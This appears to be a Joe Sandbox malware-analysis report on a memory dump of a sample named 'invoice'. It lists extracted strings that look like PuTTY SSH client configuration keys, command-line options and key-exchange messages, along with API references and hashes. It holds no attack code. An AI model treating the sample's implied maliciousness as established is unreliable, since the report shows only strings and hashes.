BugRSAPad2, xrefs: 000000013FD6F585
BellOverloadS, xrefs: 000000013FD6ECD8
AuthKI, xrefs: 000000013FD6E663
CloseOnExit, xrefs: 000000013FD6E0E4
BellWaveFile, xrefs: 000000013FD6EC5B
NoMouseReporting, xrefs: 000000013FD6E8A7
WinNameAlways, xrefs: 000000013FD6EDDA
PassiveTelnet, xrefs: 000000013FD6E7E8
SshNoTrivialAuth, xrefs: 000000013FD6E603
MousePaste, xrefs: 000000013FD6F1BD
Protocol, xrefs: 000000013FD6E082
%s%d, xrefs: 000000013FD6F10D
CtrlShiftCV, xrefs: 000000013FD6F1FD
ScrollbackLines, xrefs: 000000013FD6ECF7
WideBoldFont, xrefs: 000000013FD6F719
ProxyExcludeList, xrefs: 000000013FD6E252
%d,%d,%d, xrefs: 000000013FD6EFC7
TCPNoDelay, xrefs: 000000013FD6E19B
SUPDUPMoreProcessing, xrefs: 000000013FD6F90F
ScrollBar, xrefs: 000000013FD6F2C4
RectSelect, xrefs: 000000013FD6F089
Colour%d, xrefs: 000000013FD6EF75
ShadowBoldOffset, xrefs: 000000013FD6F758
BugPlainPW1, xrefs: 000000013FD6F4CC
X11Display, xrefs: 000000013FD6F3DF
ConnectionSharingDownstream, xrefs: 000000013FD6F894
ConnectionSharing, xrefs: 000000013FD6F854
X11Forward, xrefs: 000000013FD6F3C3
ScrollbarOnLeft, xrefs: 000000013FD6F6BF
Xterm256Colour, xrefs: 000000013FD6EF14
BugMaxPkt2, xrefs: 000000013FD6F5F4
LineCodePage, xrefs: 000000013FD6F222
Present, xrefs: 000000013FD6DF30
RemotePortAcceptAll, xrefs: 000000013FD6F460
ChangeUsername, xrefs: 000000013FD6E4CB
MouseIsXterm, xrefs: 000000013FD6F066
SshProt, xrefs: 000000013FD6E728
BugHMAC2, xrefs: 000000013FD6F53B
AgentFwd, xrefs: 000000013FD6E48B
X11AuthFile, xrefs: 000000013FD6F41D
SerialParity, xrefs: 000000013FD6F7F3
NoApplicationCursors, xrefs: 000000013FD6E887
UseSystemColours, xrefs: 000000013FD6EEB4
BugDeriveKey2, xrefs: 000000013FD6F560
AltOnly, xrefs: 000000013FD6EA46
HideMousePtr, xrefs: 000000013FD6EB83
CJKAmbigWide, xrefs: 000000013FD6F245
LogFlush, xrefs: 000000013FD6DFCF
UserNameFromEnvironment, xrefs: 000000013FD6E3EC
GSSLibs, xrefs: 000000013FD6E6C6
HostName, xrefs: 000000013FD6DF4F
NoRemoteCharset, xrefs: 000000013FD6E986
CapsLockCyr, xrefs: 000000013FD6F2A4
BugIgnore2, xrefs: 000000013FD6F516
Printer, xrefs: 000000013FD6F281
AuthGSSAPIKEX, xrefs: 000000013FD6E6A3
BugRSA1, xrefs: 000000013FD6F4F1
LogFileName, xrefs: 000000013FD6DF6E
AltSpace, xrefs: 000000013FD6EA26
LFImpliesCR, xrefs: 000000013FD6ED5A
EraseToScrollback, xrefs: 000000013FD6F344
GssapiRekey, xrefs: 000000013FD6E5A1
StampUtmp, xrefs: 000000013FD6F67F
LocalEcho, xrefs: 000000013FD6EAE2
LocalUserName, xrefs: 000000013FD6E408
DisableBidi, xrefs: 000000013FD6EDBA
RekeyBytes, xrefs: 000000013FD6E5C0
TryPalette, xrefs: 000000013FD6EED4
TelnetKey, xrefs: 000000013FD6EAA6
CurType, xrefs: 000000013FD6EBDE
BoldAsColour, xrefs: 000000013FD6EF54
BugIgnore1, xrefs: 000000013FD6F4A7
ProxyHost, xrefs: 000000013FD6E2F3
TermHeight, xrefs: 000000013FD6EE34
LogFileClash, xrefs: 000000013FD6DFAC
SerialStopHalfbits, xrefs: 000000013FD6F7D4
CtrlShiftIns, xrefs: 000000013FD6F1DD
BCE, xrefs: 000000013FD6F383
AlwaysOnTop, xrefs: 000000013FD6EB43
TerminalSpeed, xrefs: 000000013FD6E1F6
ProxyPassword, xrefs: 000000013FD6E350
GssapiFwd, xrefs: 000000013FD6E4AB
WarnOnClose, xrefs: 000000013FD6E104
AuthTIS, xrefs: 000000013FD6E643
LockSize, xrefs: 000000013FD6F360
GSSCustom, xrefs: 000000013FD6E6E9
NoRemoteClearScroll, xrefs: 000000013FD6E927
LogType, xrefs: 000000013FD6DF8D
UTF8linedraw, xrefs: 000000013FD6F02A
LoginShell, xrefs: 000000013FD6F69F
ApplicationCursorKeys, xrefs: 000000013FD6E9A6
LocalPortAcceptAll, xrefs: 000000013FD6F440
BugRekey2, xrefs: 000000013FD6F5CF
NoRemoteResize, xrefs: 000000013FD6E8C7
NoAltScreen, xrefs: 000000013FD6E8E7
SUPDUPCharset, xrefs: 000000013FD6F8EC
PasteControls, xrefs: 000000013FD6F0A9
PublicKeyFile, xrefs: 000000013FD6E786
raw, xrefs: 000000013FD6E052
TermWidth, xrefs: 000000013FD6EE15
NoApplicationKeys, xrefs: 000000013FD6E867
SSHManualHostKeys, xrefs: 000000013FD6F8A8
HostKey, xrefs: 000000013FD6E539
LocalEdit, xrefs: 000000013FD6EB01
NoRemoteWinTitle, xrefs: 000000013FD6E907
ProxyPort, xrefs: 000000013FD6E312
ProxyMethod, xrefs: 000000013FD6E2D4
TrueColour, xrefs: 000000013FD6EF34
WindowBorder, xrefs: 000000013FD6EBBF
BlinkText, xrefs: 000000013FD6F3A3
ProxyUsername, xrefs: 000000013FD6E331
Answerback, xrefs: 000000013FD6EB20
BlinkCur, xrefs: 000000013FD6EC01
ApplicationKeypad, xrefs: 000000013FD6E9C6

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: Value
String ID: %d,%d,%d$%s%d$-$ANSIColour$AddressFamily$AgentFwd$AltF4$AltOnly$AltSpace$AlwaysOnTop$Answerback$ApplicationCursorKeys$ApplicationKeypad$AuthGSSAPI$AuthGSSAPIKEX$AuthKI$AuthTIS$AutoWrapMode$BCE$BackspaceIsDelete$Beep$BeepInd$BellOverload$BellOverloadN$BellOverloadS$BellOverloadT$BellWaveFile$BlinkCur$BlinkText$BoldAsColour$BugChanReq$BugDeriveKey2$BugHMAC2$BugIgnore1$BugIgnore2$BugMaxPkt2$BugOldGex2$BugPKSessID2$BugPlainPW1$BugRSA1$BugRSAPad2$BugRekey2$BugWinadj$CJKAmbigWide$CRImpliesLF$CapsLockCyr$ChangeUsername$Cipher$CloseOnExit$Colour%d$ComposeKey$Compression$ConnectionSharing$ConnectionSharingDownstream$ConnectionSharingUpstream$CtrlAltKeys$CtrlShiftCV$CtrlShiftIns$CurType$DECOriginMode$DisableArabicShaping$DisableBidi$EraseToScrollback$FontQuality$FontVTMode$FullScreenOnAltEnter$GSSCustom$GSSLibs$GssapiFwd$GssapiRekey$HideMousePtr$HostKey$HostName$LFImpliesCR$LineCodePage$LinuxFunctionKeys$LocalEcho$LocalEdit$LocalPortAcceptAll$LocalUserName$LockSize$LogFileClash$LogFileName$LogFlush$LogHeader$LogHost$LogType$LoginShell$MouseAutocopy$MouseIsXterm$MouseOverride$MousePaste$NetHackKeypad$NoAltScreen$NoApplicationCursors$NoApplicationKeys$NoDBackspace$NoMouseReporting$NoPTY$NoRemoteCharset$NoRemoteClearScroll$NoRemoteResize$NoRemoteWinTitle$PassiveTelnet$PasteControls$PasteRTF$PingInterval$PingIntervalSecs$PortForwardings$PortNumber$PreferKnownHostKeys$Present$Printer$Protocol$ProxyDNS$ProxyExcludeList$ProxyHost$ProxyLocalhost$ProxyLogToTerm$ProxyMethod$ProxyPassword$ProxyPort$ProxyTelnetCommand$ProxyUsername$PublicKeyFile$RFCEnviron$RXVTHomeEnd$RawCNP$RectSelect$RekeyBytes$RekeyTime$RemoteCommand$RemotePortAcceptAll$RemoteQTitleAction$SSH2DES$SSHLogOmitData$SSHLogOmitPasswords$SSHManualHostKeys$SUPDUPCharset$SUPDUPLocation$SUPDUPMoreProcessing$SUPDUPScrolling$ScrollBar$ScrollBarFullScreen$ScrollOnDisp$ScrollOnKey$ScrollbackLines$ScrollbarOnLeft$SerialDataBits$SerialFlowControl$SerialLine$SerialParity$SerialSpeed$SerialStopHalfbits$ShadowBold$ShadowBoldOffset$SshBanner$SshNoAuth$SshNoShell$SshNoTrivialAuth$SshProt$StampUtmp$SunkenEdge$TCPKeepalives$TCPNoDelay$TelnetKey$TelnetRet$TermHeight$TermWidth$TerminalModes$TerminalSpeed$TerminalType$TrueColour$TryAgent$TryPalette$UTF8Override$UTF8linedraw$UseSystemColours$UserNameFromEnvironment$WarnOnClose$WideBoldFont$WideFont$WinNameAlways$WindowBorder$WindowClass$Wordness%d$X11AuthFile$X11AuthType$X11Display$X11Forward$Xterm256Colour$raw
API String ID: 3702945584-1849423672
Opcode ID: bf9b97daeb61950b41e4622629df6617450300813db5a6df4fe3ebca91fe7ff8
Instruction ID: 8c8659ed1b69dd37ac914fd46bc7a433dfac73d17713657ee23aab01d67f3916
Opcode Fuzzy Hash: bf9b97daeb61950b41e4622629df6617450300813db5a6df4fe3ebca91fe7ff8
Instruction Fuzzy Hash: 18D25D70B1021096FE14A7A6D85A7EA2352A785FC0F94953A5C894FF9FDE7CC3078329

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDC7200 Relevance: 121.1, APIs: 38, Strings: 31, Instructions: 365libraryloaderregistryCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 000000013FDC7268
RegOpenKeyA.ADVAPI32 ref: 000000013FDC72A5
RegQueryValueExA.ADVAPI32 ref: 000000013FDC72DC
RegQueryValueExA.ADVAPI32 ref: 000000013FDC732C
LoadLibraryExA.KERNEL32 ref: 000000013FDC73B3
FreeLibrary.KERNEL32 ref: 000000013FDC73CB
GetProcAddress.KERNEL32 ref: 000000013FDC745C
GetProcAddress.KERNEL32 ref: 000000013FDC746E
GetProcAddress.KERNEL32 ref: 000000013FDC7480
GetProcAddress.KERNEL32 ref: 000000013FDC7492
GetProcAddress.KERNEL32 ref: 000000013FDC74A7
GetProcAddress.KERNEL32 ref: 000000013FDC74BC
GetProcAddress.KERNEL32 ref: 000000013FDC74D1
GetProcAddress.KERNEL32 ref: 000000013FDC74E6
GetProcAddress.KERNEL32 ref: 000000013FDC74FB
GetProcAddress.KERNEL32 ref: 000000013FDC7510
GetProcAddress.KERNEL32 ref: 000000013FDC7525
RegCloseKey.ADVAPI32 ref: 000000013FDC7408

Part of subcall function 000000013FDC9F02: GetSystemDirectoryA.KERNEL32 ref: 000000013FDC9F1E
Part of subcall function 000000013FDC9F02: GetSystemDirectoryA.KERNEL32 ref: 000000013FDC9F71
Part of subcall function 000000013FDC9F02: LoadLibraryA.KERNEL32 ref: 000000013FDC9F9E

GetProcAddress.KERNEL32 ref: 000000013FDC7591
GetProcAddress.KERNEL32 ref: 000000013FDC75A5
GetProcAddress.KERNEL32 ref: 000000013FDC75B9
GetProcAddress.KERNEL32 ref: 000000013FDC75CD
GetProcAddress.KERNEL32 ref: 000000013FDC75E1
GetProcAddress.KERNEL32 ref: 000000013FDC75F5
GetProcAddress.KERNEL32 ref: 000000013FDC7609
GetProcAddress.KERNEL32 ref: 000000013FDC761D
LoadLibraryExA.KERNEL32 ref: 000000013FDC7744
GetProcAddress.KERNEL32 ref: 000000013FDC77A3
GetProcAddress.KERNEL32 ref: 000000013FDC77B4
GetProcAddress.KERNEL32 ref: 000000013FDC77C5
GetProcAddress.KERNEL32 ref: 000000013FDC77D6
GetProcAddress.KERNEL32 ref: 000000013FDC77EA
GetProcAddress.KERNEL32 ref: 000000013FDC77FE
GetProcAddress.KERNEL32 ref: 000000013FDC7812
GetProcAddress.KERNEL32 ref: 000000013FDC7826
GetProcAddress.KERNEL32 ref: 000000013FDC783A
GetProcAddress.KERNEL32 ref: 000000013FDC784E
GetProcAddress.KERNEL32 ref: 000000013FDC7862

Strings

Using GSSAPI from user-specified library '%s', xrefs: 000000013FDC7776
VerifySignature, xrefs: 000000013FDC7613
gss_release_buffer, xrefs: 000000013FDC74C7, 000000013FDC7808
AddDllDirectory, xrefs: 000000013FDC7261
gss_inquire_cred_by_mech, xrefs: 000000013FDC751B, 000000013FDC7858
gss_get_mic, xrefs: 000000013FDC7476, 000000013FDC77BB
\gssapi6, xrefs: 000000013FDC738B
gss_delete_sec_context, xrefs: 000000013FDC744B, 000000013FDC7792
%.*s, xrefs: 000000013FDC76FF
dw, xrefs: 000000013FDC7452, 000000013FDC7587, 000000013FDC7799
gss_release_cred, xrefs: 000000013FDC74DC, 000000013FDC781C
gss_init_sec_context, xrefs: 000000013FDC74B2, 000000013FDC77F4
FreeContextBuffer, xrefs: 000000013FDC75AF
kernel32.dll, xrefs: 000000013FDC7242
gss_release_name, xrefs: 000000013FDC74F1, 000000013FDC7830
MakeSignature, xrefs: 000000013FDC75FF
Using SSPI from SECUR32.DLL, xrefs: 000000013FDC756C
DeleteSecurityContext, xrefs: 000000013FDC75D7
i64.dll, xrefs: 000000013FDC7399
AcquireCredentialsHandleA, xrefs: 000000013FDC7580
secur32.dll, xrefs: 000000013FDC7538
QueryContextAttributesA, xrefs: 000000013FDC75EB
InstallDir, xrefs: 000000013FDC72CB, 000000013FDC731D
gss_acquire_cred, xrefs: 000000013FDC7506, 000000013FDC7844
InitializeSecurityContextA, xrefs: 000000013FDC759B
FreeCredentialsHandle, xrefs: 000000013FDC75C3
gss_verify_mic, xrefs: 000000013FDC7488, 000000013FDC77CC
gss_import_name, xrefs: 000000013FDC749D, 000000013FDC77E0
gss_display_status, xrefs: 000000013FDC7464, 000000013FDC77AA
Using GSSAPI from GSSAPI64.DLL, xrefs: 000000013FDC7437
SOFTWARE\MIT\Kerberos, xrefs: 000000013FDC7292

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: AddressProc$Library$Load$DirectoryQuerySystemValue$CloseFreeOpen
String ID: dw$%.*s$AcquireCredentialsHandleA$AddDllDirectory$DeleteSecurityContext$FreeContextBuffer$FreeCredentialsHandle$InitializeSecurityContextA$InstallDir$MakeSignature$QueryContextAttributesA$SOFTWARE\MIT\Kerberos$Using GSSAPI from GSSAPI64.DLL$Using GSSAPI from user-specified library '%s'$Using SSPI from SECUR32.DLL$VerifySignature$\gssapi6$gss_acquire_cred$gss_delete_sec_context$gss_display_status$gss_get_mic$gss_import_name$gss_init_sec_context$gss_inquire_cred_by_mech$gss_release_buffer$gss_release_cred$gss_release_name$gss_verify_mic$i64.dll$kernel32.dll$secur32.dll
API String ID: 213264439-415341181
Opcode ID: 5b2386d1f8af14304a7e20a53329b68d52052b0996ec15c03c1bb87dd6b00a20
Instruction ID: 368f7ddc33d3b3a258ba59bd02548d00425acf09d966cf9b41c531cf98c833af
Opcode Fuzzy Hash: 5b2386d1f8af14304a7e20a53329b68d52052b0996ec15c03c1bb87dd6b00a20
Instruction Fuzzy Hash: 95023475A01B4195EB14EB56F9943EA73A5FB85B84F81923EDE9A07364EF3CC246C300

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FD519C8 Relevance: 85.3, APIs: 5, Strings: 43, Instructions: 1331COMMON

Download Yara Rule

Strings

-%c expects at least two colons in its argument, xrefs: 000000013FD52474
telnet:, xrefs: 000000013FD51DEB
-restrictacl, xrefs: 000000013FD527C3
../cmdline.c, xrefs: 000000013FD51CCD
-sessionlog, xrefs: 000000013FD52713
-sshlog, xrefs: 000000013FD5272A, 000000013FD52EC0
-pw, xrefs: 000000013FD51B42
-sshrawlog, xrefs: 000000013FD52741
Unrecognised suboption "-sercfg %s", xrefs: 000000013FD52D4B
1.5, xrefs: 000000013FD52CAB
-ipv6, xrefs: 000000013FD526C2
-nc expects argument of form 'host:port', xrefs: 000000013FD527F2
-noagent, xrefs: 000000013FD51BCB
Unrecognised suboption "-sercfg %c", xrefs: 000000013FD52E1A
-restrict_acl, xrefs: 000000013FD527B0
%.*s, xrefs: 000000013FD51E35, 000000013FD52041, 000000013FD520FB, 000000013FD5224C
-noshare, xrefs: 000000013FD5254E, 000000013FD52879
retd == 2, xrefs: 000000013FD51CC6
unrecognised protocol prefix '%s', xrefs: 000000013FD520B9
-no-trivial-auth, xrefs: 000000013FD51C10, 000000013FD5250A
unable to open command file "%s", xrefs: 000000013FD52897
-ipv4, xrefs: 000000013FD52675
-pagent, xrefs: 000000013FD51B6C
-restrict-acl, xrefs: 000000013FD5279D
-proxycmd, xrefs: 000000013FD52786
-load, xrefs: 000000013FD51A08
-nopagent, xrefs: 000000013FD51BE2
-agent, xrefs: 000000013FD51B59
-share, xrefs: 000000013FD52537
L%s, xrefs: 000000013FD52488
the -sercfg option can only be used with the serial protocol, xrefs: 000000013FD52C94
the -pw option can only be used with the SSH protocol, xrefs: 000000013FD528A6
option "%s" not available in this tool, xrefs: 000000013FD52BC3, 000000013FD5304F
-logoverwrite, xrefs: 000000013FD52758, 000000013FD52EF1
%c%.*s, xrefs: 000000013FD51FA1
-sercfg, xrefs: 000000013FD526FC
-hostkey, xrefs: 000000013FD51AA1
-nopageant, xrefs: 000000013FD51BF9
-loghost, xrefs: 000000013FD51A8A
-nc, xrefs: 000000013FD51AFD
'%s' is not a valid format for a manual host key specification, xrefs: 000000013FD52458
-logappend, xrefs: 000000013FD5276F
-pageant, xrefs: 000000013FD51B7F

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID:
String ID: %.*s$%c%.*s$'%s' is not a valid format for a manual host key specification$-%c expects at least two colons in its argument$-agent$-hostkey$-ipv4$-ipv6$-load$-logappend$-loghost$-logoverwrite$-nc$-nc expects argument of form 'host:port'$-no-trivial-auth$-noagent$-nopageant$-nopagent$-noshare$-pageant$-pagent$-proxycmd$-pw$-restrict-acl$-restrict_acl$-restrictacl$-sercfg$-sessionlog$-share$-sshlog$-sshrawlog$../cmdline.c$1.5$L%s$Unrecognised suboption "-sercfg %c"$Unrecognised suboption "-sercfg %s"$option "%s" not available in this tool$retd == 2$telnet:$the -pw option can only be used with the SSH protocol$the -sercfg option can only be used with the serial protocol$unable to open command file "%s"$unrecognised protocol prefix '%s'
API String ID: 0-1483961516
Opcode ID: 80853b8a62798c1379da970b7b2cd7708df7741a9733fc5abb3f9588a4e6177a
Instruction ID: ae662b37d00f838fac10ff3a9f8a3cf445fa05fd64ac699cab29f716b194cf90
Opcode Fuzzy Hash: 80853b8a62798c1379da970b7b2cd7708df7741a9733fc5abb3f9588a4e6177a
Instruction Fuzzy Hash: 2EC29E31E0434181FE65ABE69A5D3FA16826B91B84F54003D9D1E0BBE7EB6DCB4FD201

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FD7E130 Relevance: 61.2, Strings: 48, Instructions: 1163COMMON

Download Yara Rule

Strings

Unable to parse Diffie-Hellman reply packet, xrefs: 000000013FD7EDC1
ssh_key_alg(s->hkey) == s->cross_certifying, xrefs: 000000013FD7F68C
s->keystr, xrefs: 000000013FD7FA58
nbits > 0, xrefs: 000000013FD7EA51
Storing additional host key for this host:, xrefs: 000000013FD7F6B9
User aborted at host key verification, xrefs: 000000013FD7E5B1
Received invalid elliptic curve point in ECDH reply, xrefs: 000000013FD7E428
GSSAPI key exchange failed to initialise, xrefs: 000000013FD7EF38
Host key was different in repeat key exchange, xrefs: 000000013FD7FA96
any of them, xrefs: 000000013FD7F8A2
Signature from server's host key is invalid, xrefs: 000000013FD7F804
GSSAPI Key Exchange complete!, xrefs: 000000013FD7F4FF
Non-GSS rekey after initial GSS kex used host key:, xrefs: 000000013FD7FAA2
Unable to parse ECDH reply packet, xrefs: 000000013FD7EA1F
Received unexpected packet when expecting Diffie-Hellman group, type %d (%s), xrefs: 000000013FD7E9E4
s->shgss->srv_name, xrefs: 000000013FD7EF56
Doing RSA key exchange with hash %s, xrefs: 000000013FD7E5E9
Server's host key is invalid, xrefs: 000000013FD7F7C7
Unable to parse Diffie-Hellman group packet, xrefs: 000000013FD7E9B5
s->kex_alg->main_type == KEXTYPE_RSA, xrefs: 000000013FD7E5C2
GSSAPI key exchange MIC was not valid, xrefs: 000000013FD7F4CA
GSSAPI key exchange failed to initialise context: %s, xrefs: 000000013FD7F2C8
Doing Diffie-Hellman key exchange using %d-bit modulus and hash %s with a server-supplied group, xrefs: 000000013FD7E2A6
Received unexpected packet when expecting RSA public key, type %d (%s), xrefs: 000000013FD7E784
No fallback host key available, xrefs: 000000013FD7FB1F
../ssh2kex-client.c, xrefs: 000000013FD7E5C9, 000000013FD7EA58, 000000013FD7EF5D, 000000013FD7F15A, 000000013FD7F667, 000000013FD7F693, 000000013FD7F733, 000000013FD7FA5F
GSSAPI key exchange MIC was not valid: %s, xrefs: 000000013FD7F7E1
s->gss_stat == SSH_GSS_S_COMPLETE || s->gss_stat == SSH_GSS_S_CONTINUE_NEEDED, xrefs: 000000013FD7F153
GSSAPI reply failed validation: %s, xrefs: 000000013FD7F29B
Received unexpected packet when expecting RSA kex signature, type %d (%s), xrefs: 000000013FD7EBE0
Doing GSSAPI (with Kerberos V5) Diffie-Hellman key exchange with hash %s, xrefs: 000000013FD7EE77
s->hkey, xrefs: 000000013FD7F660, 000000013FD7F72C
GSSAPI key exchange failed: no initial context token, xrefs: 000000013FD7F2AE
Post-GSS rekey provided fallback host key:, xrefs: 000000013FD7F767
Received unexpected packet when expecting Diffie-Hellman reply, type %d (%s), xrefs: 000000013FD7EDF5
Diffie-Hellman reply failed validation: %s, xrefs: 000000013FD7EE24
Received unexpected packet when expecting ECDH reply, type %d (%s), xrefs: 000000013FD7E59E
Unable to parse RSA kex signature, xrefs: 000000013FD7EBB1
Server sent %d-bit RSA key, less than the minimum size %d for %s key exchange, xrefs: 000000013FD7E74D
GSSAPI key exchange initialised, xrefs: 000000013FD7F245
Unable to parse RSA public key packet, xrefs: 000000013FD7EA32
Host key fingerprint is:, xrefs: 000000013FD7F905
Host key did not appear in manually configured list, xrefs: 000000013FD7FB05
Received unexpected packet during GSSAPI key exchange, type %d (%s), xrefs: 000000013FD7FD6A
Server also has %s host key%s, but we don't know %s, xrefs: 000000013FD7F8C6
GSS kex provided fallback host key:, xrefs: 000000013FD7F5DD
Server's host key did not match any used in previous GSS kex, xrefs: 000000013FD7FAEA
%s/%s, xrefs: 000000013FD7F819

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID:
String ID: %s/%s$../ssh2kex-client.c$Diffie-Hellman reply failed validation: %s$Doing Diffie-Hellman key exchange using %d-bit modulus and hash %s with a server-supplied group$Doing GSSAPI (with Kerberos V5) Diffie-Hellman key exchange with hash %s$Doing RSA key exchange with hash %s$GSS kex provided fallback host key:$GSSAPI Key Exchange complete!$GSSAPI key exchange MIC was not valid$GSSAPI key exchange MIC was not valid: %s$GSSAPI key exchange failed to initialise$GSSAPI key exchange failed to initialise context: %s$GSSAPI key exchange failed: no initial context token$GSSAPI key exchange initialised$GSSAPI reply failed validation: %s$Host key did not appear in manually configured list$Host key fingerprint is:$Host key was different in repeat key exchange$No fallback host key available$Non-GSS rekey after initial GSS kex used host key:$Post-GSS rekey provided fallback host key:$Received invalid elliptic curve point in ECDH reply$Received unexpected packet during GSSAPI key exchange, type %d (%s)$Received unexpected packet when expecting Diffie-Hellman group, type %d (%s)$Received unexpected packet when expecting Diffie-Hellman reply, type %d (%s)$Received unexpected packet when expecting ECDH reply, type %d (%s)$Received unexpected packet when expecting RSA kex signature, type %d (%s)$Received unexpected packet when expecting RSA public key, type %d (%s)$Server also has %s host key%s, but we don't know %s$Server sent %d-bit RSA key, less than the minimum size %d for %s key exchange$Server's host key did not match any used in previous GSS kex$Server's host key is invalid$Signature from server's host key is invalid$Storing additional host key for this host:$Unable to parse Diffie-Hellman group packet$Unable to parse Diffie-Hellman reply packet$Unable to parse ECDH reply packet$Unable to parse RSA kex signature$Unable to parse RSA public key packet$User aborted at host key verification$any of them$nbits > 0$s->gss_stat == SSH_GSS_S_COMPLETE || s->gss_stat == SSH_GSS_S_CONTINUE_NEEDED$s->hkey$s->kex_alg->main_type == KEXTYPE_RSA$s->keystr$s->shgss->srv_name$ssh_key_alg(s->hkey) == s->cross_certifying
API String ID: 0-2341615928
Opcode ID: 5026dd755191acaa19d7008b0a805464648e38e2ea543b8cbca50f32f5d8b971
Instruction ID: a12e3ebe3c6bf68a988acd1854d81543a1957fc7490f67057404b9c7c0866137
Opcode Fuzzy Hash: 5026dd755191acaa19d7008b0a805464648e38e2ea543b8cbca50f32f5d8b971
Instruction Fuzzy Hash: 79D26236A00BD981EA90DF56D55C7EE2369FB85B84F41813AEE4D4B3A5DF34CA86C340

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDD9CD8 Relevance: 40.4, APIs: 20, Strings: 2, Instructions: 1865COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000000013FDDA054
_invalid_parameter_noinfo.LIBCMT ref: 000000013FDDA269
_invalid_parameter_noinfo.LIBCMT ref: 000000013FDDA58B
_invalid_parameter_noinfo.LIBCMT ref: 000000013FDDA788
memcpy_s.LIBCPMT ref: 000000013FDDA9EC
memcpy_s.LIBCPMT ref: 000000013FDDAA7C
memcpy_s.LIBCPMT ref: 000000013FDDAC2E
memcpy_s.LIBCPMT ref: 000000013FDDAE02
memcpy_s.LIBCPMT ref: 000000013FDDAEF0
memcpy_s.LIBCPMT ref: 000000013FDDAF26
memcpy_s.LIBCPMT ref: 000000013FDDAFBB
memcpy_s.LIBCPMT ref: 000000013FDDB0CC
memcpy_s.LIBCPMT ref: 000000013FDDB172
memcpy_s.LIBCPMT ref: 000000013FDDB1B9
memcpy_s.LIBCPMT ref: 000000013FDDB3EB
memcpy_s.LIBCPMT ref: 000000013FDDB454
memcpy_s.LIBCPMT ref: 000000013FDDB48F
memcpy_s.LIBCPMT ref: 000000013FDDB537
memcpy_s.LIBCPMT ref: 000000013FDDB74B
memcpy_s.LIBCPMT ref: 000000013FDDB92E

Strings

, xrefs: 000000013FDDB75D
MZx, xrefs: 000000013FDD9D0B, 000000013FDD9F09, 000000013FDDA285, 000000013FDDA37C, 000000013FDDA3BC, 000000013FDDA3F0, 000000013FDDA43E, 000000013FDDA7D2, 000000013FDDAAE5, 000000013FDDAB1A, 000000013FDDAE40, 000000013FDDB028, 000000013FDDB05D, 000000013FDDB426

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
